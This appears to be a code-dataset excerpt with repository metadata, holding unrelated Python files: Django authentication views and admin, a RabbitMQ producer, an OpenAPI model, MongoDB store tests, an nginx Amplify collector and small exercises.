def __init__(self, *args, **kwargs):
"""Elimina posibles usuarios expirados."""
RegisterUser.objects.delete_expired_users_temp()
super().__init__(*args, **kwargs)
def get_success_url(self):
"""Si todo OK, envía el email para verificación y redirecciona."""
self._send_email_with_token()
return reverse('authentication:success')
def _send_email_with_token(self):
"""Envía un email con token para terminar proceso de registro."""
current_site = get_current_site(self.request)
site_name = current_site.name
url_validate_token = get_full_path(
self.request,
'authentication:validate_token',
token=self.object.token
)
context = {
'username': self.object.username,
'email': self.object.email,
'site_name': site_name,
'url_validate_token': url_validate_token
}
send_templated_mail(
subject=_(f'Validación de email en {site_name}'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[self.object.email],
context=context,
template_text='authentication/emails/register_success.txt'
)
class RegisterUserSuccessView(AnonymousRequiredMixin, generic.TemplateView):
template_name = 'authentication/success.html'
class RegisterUserValidateTokenView(AnonymousRequiredMixin, generic.TemplateView):
"""Validación email de un nuevo registro a través del token."""
template_name = 'authentication/validate_token.html'
def get(self, request, *args, **kwargs):
RegisterUser.objects.delete_expired_users_temp()
token = self.kwargs.get('token')
try:
user_temp = RegisterUser.objects.get(token=token)
except RegisterUser.DoesNotExist:
return render(request, 'authentication/token_not_exists.html')
RegisterUser.objects.move_user_tmp_to_users(UserModel, user_temp)
messages.success(request, _('El registro se ha completado con éxito'))
return redirect(reverse('authentication:login'))
class LoginView(AnonymousRequiredMixin, views.LoginView):
template_name = 'authentication/login.html'
form_class = AuthenticationForm
class LogoutView(LoginRequiredMixin, views.LogoutView):
template_name = 'authentication/logged_out.html'
class PasswordResetView(AnonymousRequiredMixin, views.PasswordResetView):
template_name = 'authentication/password_reset_form.html'
email_template_name = 'authentication/emails/password_reset_email.html'
subject_template_name = 'authentication/emails/password_reset_subject.txt'
success_url = reverse_lazy('authentication:password_reset_done')
class PasswordResetDoneView(AnonymousRequiredMixin, views.PasswordResetDoneView):
template_name = 'authentication/password_reset_done.html'
class PasswordResetConfirmView(AnonymousRequiredMixin, views.PasswordResetConfirmView):
template_name = 'authentication/password_reset_confirm.html'
success_url = reverse_lazy('authentication:password_reset_complete')
class PasswordResetCompleteView(AnonymousRequiredMixin, views.PasswordResetCompleteView):
template_name = 'authentication/password_reset_complete.html'
class PasswordChangeView(views.PasswordChangeView):
template_name = 'authentication/password_change_form.html'
success_url = reverse_lazy('authentication:password_change_done')
class PasswordChangeDoneView(views.PasswordChangeDoneView):
template_name = 'authentication/password_change_done.html'
class UserEmailUpdateView(LoginRequiredMixin, generic.FormView):
template_name = 'authentication/email_update.html'
form_class = UserEmailUpdateForm
model = UserEmailUpdate
def get_initial(self):
"""Establece datos en los campos del form."""
initial = super().get_initial()
initial['user'] = self.request.user.id
initial['token'] = UserEmailUpdate.objects.generate_unique_token()
initial['new_email'] = self.request.user.email
return initial
def form_valid(self, form):
"""Envía el email de confirmación."""
new_email = form.cleaned_data['new_email']
token = form.cleaned_data['token']
UserEmailUpdate.objects.update_or_create(
defaults={'new_email': new_email, 'token': token},
user=self.request.user
)
self._send_confirm_email_for_validate(token, new_email)
return super().form_valid(form)
def get_success_url(self):
msg = _('Se ha enviado un email a la nueva dirección para la confirmación')
messages.success(self.request, msg)
return reverse('accounts:profile')
def _send_confirm_email_for_validate(self, token, new_email):
"""Envía un email para la confirmación del nuevo email con un token."""
current_site = get_current_site(self.request)
url_validate_token = get_full_path(
self.request,
'authentication:email_update_validate',
token=token
)
context = {
'url_validate_token': url_validate_token,
'site_name': current_site.name
}
send_templated_mail(
subject=_('Confirmación cambio de email'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[new_email],
context=context,
template_text='authentication/emails/email_update_confirm.txt'
)
class UserEmailUpdateValidateView(LoginRequiredMixin, generic.View):
"""Verifica el token de cambio de email.
Para mayor seguridad, el usuario ha de estar logueado.
Una vez comprobado y actualizado el nuevo email, elimina el
email temporal.
"""
def get(self, request, *args, **kwargs):
"""Comprueba el token que coincida."""
token = kwargs.get('token')
try:
email_update = UserEmailUpdate.objects.get(token=token, user=request.user)
except UserEmailUpdate.DoesNotExist:
return redirect('authentication:token_email_not_exists')
self.request.user.email = email_update.new_email
self.request.user.save()
email_update.delete()
messages.success(request, _('Se ha actualizado el email'))
return redirect(reverse('accounts:profile'))
class UserEmailUpdateNotFoundView(generic.TemplateView):
"""El token no existe o no pertenece al usuario."""
template_name = 'authentication/token_email_not_exists.html'
class UserRemoveEmailUpdateView(generic.View):
"""Eliminar un email no confirmado por parte del usuario."""
def post(self, request, *args, **kwargs):
get_object_or_404(UserEmailUpdate, user=request.user).delete()
messages.success(request, _('Email eliminado con éxito'))
return redirect(reverse('accounts:profile'))
|
[
"[email protected]"
] | |
18cca05e8062f4f535054f5fd1a51304be50beb2
|
052275c2dd6d59a0d0fcfe85591b44106343662b
|
/listings/urls.py
|
a3b13c17beedfeffab4f7f72383dfe1ae84efa0b
|
[] |
no_license
|
nimadorostkar/Django-Real-Estate
|
93d104ad1847674103e525ae428af186fffa9e30
|
bf868e49bb4703e4081d8e7e9fd5e3ae23fc9af9
|
refs/heads/master
| 2023-08-10T17:07:29.829253 | 2021-09-19T10:55:47 | 2021-09-19T10:55:47 | 338,533,461 | 23 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 281 |
py
|
from django.urls import path
from .views import (ListingListView, ListingDetailView, search)
urlpatterns = [
path('', ListingListView.as_view(), name='listings'),
path('<int:pk>', ListingDetailView.as_view(), name='listing'),
path('search', search, name='search'),
]
|
[
"[email protected]"
] | |
0efcee193c5cdeb0e1fe1f35336a1798a94c1084
|
59080f5116b9e8f625b5cc849eb14b7ff9d19f3d
|
/122 rabbitmq/producer.py
|
f519020c40c53d1b353416228a61b9216f10522a
|
[] |
no_license
|
yyq1609/Python_road
|
eda2bcd946b480a05ec31cdcb65e35b3f3e739d1
|
e9ba2f47c8dd2d00a6e5ddff03c546152efd8f49
|
refs/heads/master
| 2020-09-11T11:51:35.903284 | 2019-11-11T13:02:21 | 2019-11-11T13:02:21 | 222,054,462 | 1 | 0 | null | 2019-11-16T05:58:13 | 2019-11-16T05:58:12 | null |
UTF-8
|
Python
| false | false | 535 |
py
|
import pika
credentials = pika.PlainCredentials('echo', '123')
connection = pika.BlockingConnection(pika.ConnectionParameters('172.16.44.142', virtual_host='vhost1', credentials=credentials))
channel = connection.channel()
channel.queue_declare(queue='test', durable=True)
channel.basic_publish(exchange='',
routing_key='test',
body='One order here!',
properties=pika.BasicProperties(delivery_mode=2),
)
print('下单成功')
connection.close()
|
[
"[email protected]"
] | |
609f208316babac07ccff737f84094897e5d863c
|
59166105545cdd87626d15bf42e60a9ee1ef2413
|
/dbpedia/models/unknown.py
|
dd1afb9f030bccf6a3766988d89ff96438847c90
|
[] |
no_license
|
mosoriob/dbpedia_api_client
|
8c594fc115ce75235315e890d55fbf6bd555fa85
|
8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc
|
refs/heads/master
| 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,224 |
py
|
# coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from dbpedia.configuration import Configuration
class Unknown(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'list[str]',
'id': 'str',
'label': 'list[str]',
'type': 'list[str]'
}
attribute_map = {
'description': 'description',
'id': 'id',
'label': 'label',
'type': 'type'
}
def __init__(self, description=None, id=None, label=None, type=None, local_vars_configuration=None): # noqa: E501
"""Unknown - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._id = None
self._label = None
self._type = None
self.discriminator = None
self.description = description
if id is not None:
self.id = id
self.label = label
self.type = type
@property
def description(self):
"""Gets the description of this Unknown. # noqa: E501
small description # noqa: E501
:return: The description of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Unknown.
small description # noqa: E501
:param description: The description of this Unknown. # noqa: E501
:type: list[str]
"""
self._description = description
@property
def id(self):
"""Gets the id of this Unknown. # noqa: E501
identifier # noqa: E501
:return: The id of this Unknown. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Unknown.
identifier # noqa: E501
:param id: The id of this Unknown. # noqa: E501
:type: str
"""
self._id = id
@property
def label(self):
"""Gets the label of this Unknown. # noqa: E501
short description of the resource # noqa: E501
:return: The label of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this Unknown.
short description of the resource # noqa: E501
:param label: The label of this Unknown. # noqa: E501
:type: list[str]
"""
self._label = label
@property
def type(self):
"""Gets the type of this Unknown. # noqa: E501
type of the resource # noqa: E501
:return: The type of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Unknown.
type of the resource # noqa: E501
:param type: The type of this Unknown. # noqa: E501
:type: list[str]
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Unknown):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Unknown):
return True
return self.to_dict() != other.to_dict()
|
[
"[email protected]"
] | |
9a3dff4505416c7621031482886acde695f4199e
|
bb00a3876ddb49dcea2cdc4bbd2356359260a563
|
/poptimizer/evolve/tests/test_store.py
|
d20ee06f325caec712a7a86b4cc74674f8863523
|
[
"Unlicense"
] |
permissive
|
hraffiest/poptimizer
|
1d2975acd0ecbe8466a7a1aa1bf631d12b4c9854
|
16bc9e056a6daa452d48cdac0dea5901e4a3d4a1
|
refs/heads/master
| 2023-04-21T02:29:06.259420 | 2021-05-05T14:33:03 | 2021-05-05T14:33:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,176 |
py
|
from types import SimpleNamespace
import bson
import pymongo
import pytest
from poptimizer.evolve import store
@pytest.fixture(scope="module", autouse=True)
def set_test_collection():
# noinspection PyProtectedMember
saved_collection = store._COLLECTION
test_collection = saved_collection.database["test"]
store._COLLECTION = test_collection
yield
store._COLLECTION = saved_collection
test_collection.drop()
def test_get_collection():
collection = store.get_collection()
assert isinstance(collection, pymongo.collection.Collection)
assert collection.name == "test"
@pytest.fixture(scope="class", name="field_instance")
def make_field_and_instance():
field = store.BaseField()
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestBaseField:
def test_set_name_index(self):
field = store.BaseField(index=True)
field.__set_name__(SimpleNamespace, "some")
assert field._name == store.ID
def test_set_name(self, field_instance):
field, _ = field_instance
field.__set_name__(SimpleNamespace, "some")
assert field._name == "some"
def test_get_raise(self, field_instance):
field, instance = field_instance
with pytest.raises(AttributeError) as error:
field.__get__(instance, SimpleNamespace)
assert "'SimpleNamespace' object has no attribute 'some'" in str(error.value)
def test_set(self, field_instance):
field, instance = field_instance
field.__set__(instance, 42)
assert hasattr(instance, "some")
assert instance.some == 42
assert len(instance._update) == 1
assert instance._update["some"] == 42
def test_get(self, field_instance):
field, instance = field_instance
assert field.__get__(instance, SimpleNamespace) == 42
@pytest.fixture(scope="class", name="default_field_instance")
def make_default_field_and_instance():
field = store.DefaultField(53)
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestDefaultField:
def test_unset_get(self, default_field_instance):
field, instance = default_field_instance
assert field.__get__(instance, SimpleNamespace) == 53
def test_set_get(self, default_field_instance):
field, instance = default_field_instance
field.__set__(instance, 64)
assert field.__get__(instance, SimpleNamespace) == 64
@pytest.fixture(scope="class", name="genotype_field_instance")
def make_genotype_field_and_instance():
field = store.GenotypeField()
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestGenotypeField:
def test_set_not_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
field.__set__(instance, None)
rez = field.__get__(instance, SimpleNamespace)
assert isinstance(rez, store.Genotype)
assert isinstance(instance.some, store.Genotype)
assert rez is instance.some
def test_set_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
genotype = store.Genotype(None)
field.__set__(instance, genotype)
assert genotype is field.__get__(instance, SimpleNamespace)
assert genotype is instance.some
class TestDoc:
def test_new_doc_and_save(self):
assert store.get_collection().count_documents({}) == 0
genotype = store.Genotype()
doc = store.Doc(genotype=genotype)
assert store.get_collection().count_documents({}) == 0
assert len(doc._update) == 2
assert isinstance(doc.id, bson.ObjectId)
assert doc.genotype is genotype
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
doc.save()
assert store.get_collection().count_documents({}) == 1
assert len(doc._update) == 0
def test_load_wrong_doc(self):
id_ = bson.ObjectId()
with pytest.raises(store.IdError) as error:
store.Doc(id_=id_)
assert str(id_) in str(error.value)
def test_load_doc(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
assert doc.id == db_doc[store.ID]
assert doc.genotype == db_doc["genotype"]
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
def test_load_doc_update_and_save(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
doc.wins = 42
doc.llh = 2.2
doc.timer = 111
assert len(doc._update) == 3
doc.save()
assert len(doc._update) == 0
doc_loaded = store.Doc(id_=db_doc[store.ID])
assert len(doc_loaded._update) == 0
assert doc_loaded.id == db_doc[store.ID]
assert doc_loaded.genotype == db_doc["genotype"]
assert doc_loaded.wins == 42
assert doc_loaded.model is None
assert doc_loaded.llh == 2.2
assert doc_loaded.date is None
assert doc_loaded.timer == 111
assert doc_loaded.tickers is None
def test_delete(self):
assert store.get_collection().count_documents({}) == 1
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
doc.delete()
assert store.get_collection().count_documents({}) == 0
|
[
"[email protected]"
] | |
6c917765f0811b156ddda90eac4c87e9f06185f7
|
f98c9dea0e212be5c7bc3161499e5633383bd4d7
|
/python/fruit_package_module_test.py
|
c82839cdcdd29c508d4f8791380d7717c7237b7c
|
[
"MIT"
] |
permissive
|
ysoftman/test_code
|
dddb5bee3420977bfa335320a09d66e5984403f5
|
0bf6307073081eeb1d654a1eb5efde44a0bdfe1e
|
refs/heads/master
| 2023-08-17T05:45:49.716829 | 2023-08-16T05:00:09 | 2023-08-16T05:00:09 | 108,200,568 | 4 | 0 |
MIT
| 2023-03-15T04:23:10 | 2017-10-25T00:49:26 |
C++
|
UTF-8
|
Python
| false | false | 509 |
py
|
# 패키지(모듈이 모인 디렉토리)가 이닌 모듈이 같은 경로에 있는 경우
# import fruite_module as fm
# alias 로 패키지.모듈 사용하기
import fruite_package.fruit_module as fm
fm.fruit.apple(100)
fm.fruit.lemon("2000")
# 패키지.모듈 전체 사용하기
from fruite_package.fruit_module import *
fruit.apple(100)
# 패키지.모듈 중 fruit 클래스를 fr 이름으로 사용
from fruite_package.fruit_module import fruit as fr
fr.lemon(200)
fr.apple(50)
fr.orange(100)
|
[
"[email protected]"
] | |
22cff3945dd868a9c060382d1020722c7a4d2eea
|
4a08ae605a8f96146b14881330d21317a67e225d
|
/data_types/question17.py
|
a245b912a288e46b12cce2f9783bf7dbe0c76b56
|
[] |
no_license
|
alex1the1great/Assignment
|
dd6083a2196d9bae36bb66bf12a2bdc07a0b93e8
|
5a806668c3bfc0d9750421c4ae287f19cbf36fc7
|
refs/heads/master
| 2022-11-13T11:07:13.875607 | 2020-06-29T03:51:17 | 2020-06-29T03:51:17 | 275,724,898 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 361 |
py
|
import re
print('Example: 1 2 3 4 5')
numbers = input('Enter list of numbers separate with space:')
pattern = r'^[0-9\s]+$'
check_multi = re.findall(pattern, numbers)
if not check_multi:
print('Please enter valid format')
else:
total = numbers.split(' ')
product = 1
for i in total:
i = int(i)
product *= i
print(product)
|
[
"[email protected]"
] | |
06c23408811bd37ee1ea076d37ef63244b96f858
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_155/945.py
|
a43e4458d2b1f38b912356b2ce0d2242713cfb2c
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 647 |
py
|
def nombre_ami(b):
debout = 0
ami = 0
compteur = 0
ami_en_plus = 0
for chiffre in b:
if compteur > debout:
ami_en_plus = (compteur - debout)
ami += ami_en_plus
debout += ami_en_plus
debout += int(chiffre)
compteur += 1
return str(ami)
def solution_jam1():
source = open("D:/Download/test.txt","r")
output = open("D:/Download/jam1long.txt","w")
liste = source.readline()
liste = liste.split('\n')
for i in range(int(liste[0])):
liste = source.readline()
liste = liste.split()
output.write('Case #'+str(i+1)+': '+nombre_ami(liste[1])+'\n')
output.close()
source.close()
solution_jam1()
|
[
"[email protected]"
] | |
e00d864ccd59cb04d2832d0d8da60884622e3044
|
b2de5660d81afdf6b1fba058faee6ece6a51e462
|
/amplify/agent/collectors/plus/upstream.py
|
ebd305b92eb648c9fd3ca9fc2b1bc0b84eb905e5
|
[
"BSD-2-Clause"
] |
permissive
|
Ferrisbane/nginx-amplify-agent
|
725d8a7da7fb66e0b41cddd8139d25a084570592
|
ef769934341374d4b6ede5fcf5ebff34f6cba8de
|
refs/heads/master
| 2021-01-22T00:03:49.686169 | 2016-07-20T17:50:30 | 2016-07-20T17:50:30 | 63,801,713 | 0 | 0 | null | 2016-07-20T17:41:25 | 2016-07-20T17:41:25 | null |
UTF-8
|
Python
| false | false | 3,982 |
py
|
# -*- coding: utf-8 -*-
from amplify.agent.collectors.plus.util import upstream
from amplify.agent.common.context import context
from amplify.agent.collectors.plus.abstract import PlusStatusCollector
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev", "Grant Hulegaard", "Arie van Luttikhuizen"]
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "[email protected]"
class UpstreamCollector(PlusStatusCollector):
short_name = 'plus_upstream'
def collect(self):
try:
tuples = self.gather_data()
for data, stamp in tuples:
# workaround for supporting old N+ format
# http://nginx.org/en/docs/http/ngx_http_status_module.html#compatibility
peers = data['peers'] if 'peers' in data else data
for peer in peers:
# This loop will aggregate all peer metrics as a single "upstream" entity.
for method in (
self.active_connections,
self.upstream_request,
self.upstream_header_time,
self.upstream_response_time,
self.upstream_responses,
self.upstream_bytes,
self.upstream_fails,
self.upstream_health_checks,
self.upstream_queue,
self.upstream_peer_count
):
try:
method(peer, stamp)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream peer metrics %s due to %s' %
(method.__name__, exception_name)
)
context.log.debug('additional info:', exc_info=True)
try:
self.increment_counters()
self.finalize_latest()
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to increment n+ upstream counters due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream metrics due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
def active_connections(self, data, stamp):
upstream.collect_active_connections(self, data, stamp)
def upstream_request(self, data, stamp):
upstream.collect_upstream_request(self, data, stamp)
def upstream_header_time(self, data, stamp):
upstream.collect_upstream_header_time(self, data, stamp)
def upstream_response_time(self, data, stamp):
upstream.collect_upstream_response_time(self, data, stamp)
def upstream_responses(self, data, stamp):
upstream.collect_upstream_responses(self, data, stamp)
def upstream_bytes(self, data, stamp):
upstream.collect_upstream_bytes(self, data, stamp)
def upstream_fails(self, data, stamp):
upstream.collect_upstream_fails(self, data, stamp)
def upstream_health_checks(self, data, stamp):
upstream.collect_upstream_health_checks(self, data, stamp)
def upstream_queue(self, data, stamp):
upstream.collect_upstream_queue(self, data, stamp)
def upstream_peer_count(self, data, stamp):
upstream.collect_upstream_peer_count(self, data, stamp)
|
[
"[email protected]"
] | |
b4cff199f29e741f20b31e5e5f92df6fd15d82ab
|
d200a54adcec3a254a909b9689f925c1614f6fb1
|
/backend/core/admin.py
|
a526227756b4d1de8a88c8269f99a134351a5779
|
[] |
no_license
|
shusaku-ishikawa/binance
|
1bbe7f4aaf32c0ade4f67da7a4c1972f414bfa19
|
60bad0848fa4f4666e2476117a79ee8452326ed1
|
refs/heads/master
| 2022-01-27T01:35:24.038917 | 2019-11-30T12:42:36 | 2019-11-30T12:42:36 | 204,909,653 | 0 | 1 | null | 2022-01-15T05:20:54 | 2019-08-28T10:50:13 |
JavaScript
|
UTF-8
|
Python
| false | false | 2,304 |
py
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
from .models import *
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.conf import settings
from django.utils.safestring import mark_safe
class MyUserChangeForm(UserChangeForm):
class Meta:
model = User
fields = '__all__'
class MyUserCreationForm(UserCreationForm):
class Meta:
model = User
fields = ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb' )
class MyUserAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password')}),
(_('Personal info'), {'fields': ()}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email','api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password1', 'password2'),
}),
)
form = MyUserChangeForm
add_form = MyUserCreationForm
list_display = ('email', 'api_key','api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'is_staff',)
search_fields = ('email',)
ordering = ('email',)
class SymbolAdmin(admin.ModelAdmin):
#list_display = [field.name for field in Symbol._meta.get_fields()]
list_display = ['symbol', 'from_currency', 'to_currency', 'side']
class OrderSequenceAdmin(admin.ModelAdmin):
list_display = ['t1', 't2', 't3']
class OrderAdmin(admin.ModelAdmin):
list_display = ['symbol', 'order_id', 'quantity', 'quote_quantity', 'price', 'time', 'status']
class OrderSequenceResultAdmin(admin.ModelAdmin):
list_display = ['master', 't1_result', 't2_result', 't3_result', 'profit']
admin.site.register(User, MyUserAdmin)
admin.site.register(Symbol, SymbolAdmin)
admin.site.register(OrderSequence, OrderSequenceAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(OrderSequenceResult, OrderSequenceResultAdmin)
|
[
"[email protected]"
] | |
4d5c0786be25e6910e4ce018e76c712744d39dae
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/74/usersdata/197/40006/submittedfiles/lecker.py
|
2e27da6fdd494d21fc5e283193a357ccb803379a
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 449 |
py
|
# -*- coding: utf-8 -*-
import math
a=int(input('Digite o valor do número a:'))
b=int(input('Digite o valor do número b:'))
c=int(input('Digite o valor do número c:'))
d=int(input('Digite o valor do número d:'))
if a>b and b<c and c>d:
print('N')
elif a==b==c==d:
print('N')
elif a<b and b>c and c<d:
print('N')
elif a>b and b<c and c<d:
print('N')
elif a==b==c>=d and a<b==c==d and a==b<c==d:
print('N')
else:
print('S')
|
[
"[email protected]"
] | |
a85eca58f0c19dea7674254798bcf77bb60ed9b8
|
a882ccf759025735f926695d6a5a39937854646a
|
/e_step4/pygame00.py
|
a91f3f96979ff338f83cd1d55dc042ebde65d456
|
[] |
no_license
|
muzudho/practice-open-cv2
|
5c1534564bcf43c2d8f7a6fb4ee1583bd77337f9
|
55af5cfb37587b08123b404cf8768d83148cb046
|
refs/heads/main
| 2023-07-08T02:23:22.984816 | 2021-08-10T10:45:01 | 2021-08-10T10:45:01 | 349,864,518 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,820 |
py
|
"""coding: utf -8
"""
# モジュールの読み込み
import sys
import time
import pygame
from pygame.locals import QUIT
# pygame の初期化
pygame.init()
# 画像の読み込み
# FRAME_COUNT = 380
FRAME_COUNT = 528
#FRAME_COUNT = 960
# FRAME_COUNT = 4560
#FRAME_COUNT = 1520
FPS = 8 # 例えば 15 フレームで撮影するなら、ゲーム画面はその半分の FPS ならコマ飛びを感じないぐらい
IMAGE1 = pygame.image.load('./@share/out-cstep4-0.png')
IMAGE1_W = IMAGE1.get_width() # 画像の横幅の取得
IMAGE1_H = IMAGE1.get_height() # 画像の高さの取得
DISPLAY_SIZE = (IMAGE1_W, IMAGE1_H) # width, height
SURFACE = pygame.display.set_mode(DISPLAY_SIZE) # アプリケーションウィンドウ
pygame.display.set_caption('Application: pygame00.py')
CLOCK = pygame.time.Clock() # フレームレート制御のための Clock オブジェクト
# 画像の先読み
FRAMES = []
for i in range(0, FRAME_COUNT):
IMAGE1 = pygame.image.load(f'./@share/out-cstep4-{i}.png')
FRAMES.append(IMAGE1)
# メインループ
WHITE = (255, 255, 255)
TOP_LEFT_P = (0, 0) # x, y
for j in range(0, 1): # 1ループ # 2ループ
for i in range(0, FRAME_COUNT):
# SURFACE.fill(WHITE) # 背景の色
SURFACE.blit(FRAMES[i], TOP_LEFT_P) # ボールの描画
# イベントキューを処理するループ
for ev in pygame.event.get():
if ev.type == QUIT: # 「終了」イベント
pygame.quit()
print('quitting...')
sys.exit()
# ディスプレイの更新
pygame.display.update()
if j == 0 and i == 0:
time.sleep(3) # Seconds
# フレームレートの設定
CLOCK.tick(FPS) # fps を指定
time.sleep(3) # Seconds
|
[
"[email protected]"
] | |
b85a75aeafda4547a9db1b598e1d8f93af10c136
|
3b628230666e2324b325d29ed8997a905dcba291
|
/web/views/report.py
|
17aff5f6356ae5632f81eedc4114595ae36f8fbe
|
[] |
no_license
|
emohamed/obshtestvo.bg
|
9f67734776ecdef5dfc5238a9caabd97c5e80cbd
|
b90c547a880294cc84956eb926413fb7118be133
|
refs/heads/master
| 2020-12-25T20:30:38.667603 | 2016-01-06T16:44:33 | 2016-01-06T16:46:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 238 |
py
|
from django.views.generic.base import View
from restful.decorators import restful_view_templates
@restful_view_templates
class ReportView(View):
    """Serve the report page; the response dict is rendered by the
    restful_view_templates decorator."""

    def get(self, request):
        # "page" presumably selects the template/section — confirm against
        # the restful_view_templates implementation.
        return {
            "page": "inner report",
        }
|
[
"[email protected]"
] | |
77bf3568089d84dca57ebccf21f5df9caf089b6b
|
c1a9436f38714277b063d76af47e8b9448d5cc73
|
/CRO/Molecule.py
|
25eaa41d932d1644507e279a2297edc8bc7924ea
|
[] |
no_license
|
rakib06/LearnPythonBasic
|
83f5bf5c63a40e8d5f93ac3ffa0d0443fdc0519a
|
fc0b81850e76d38c6816bd9fe81b442b68d6bd75
|
refs/heads/master
| 2020-09-01T01:03:49.087763 | 2019-12-25T23:11:09 | 2019-12-25T23:11:09 | 218,835,593 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 620 |
py
|
def spin_words(sentence):
    """Return *sentence* with every word of five or more letters reversed.

    Word order and single-space separation are preserved; shorter words
    pass through unchanged.
    """
    transformed = []
    for word in sentence.split():
        transformed.append(word[::-1] if len(word) >= 5 else word)
    return ' '.join(transformed)
# Sample sentence of reversed words used to demo the kata solution.
s = 'rettel rettel Kata than in etirW than desrever the in gnirts gnirts'


def spin_word_kata(sentence):
    """One-liner variant: reverse every word of 5+ letters, keep order."""
    return " ".join([x[::-1] if len(x)>=5 else x for x in sentence.split()])


print(spin_word_kata(s))
# Unrelated join/reverse demo on a small word list.
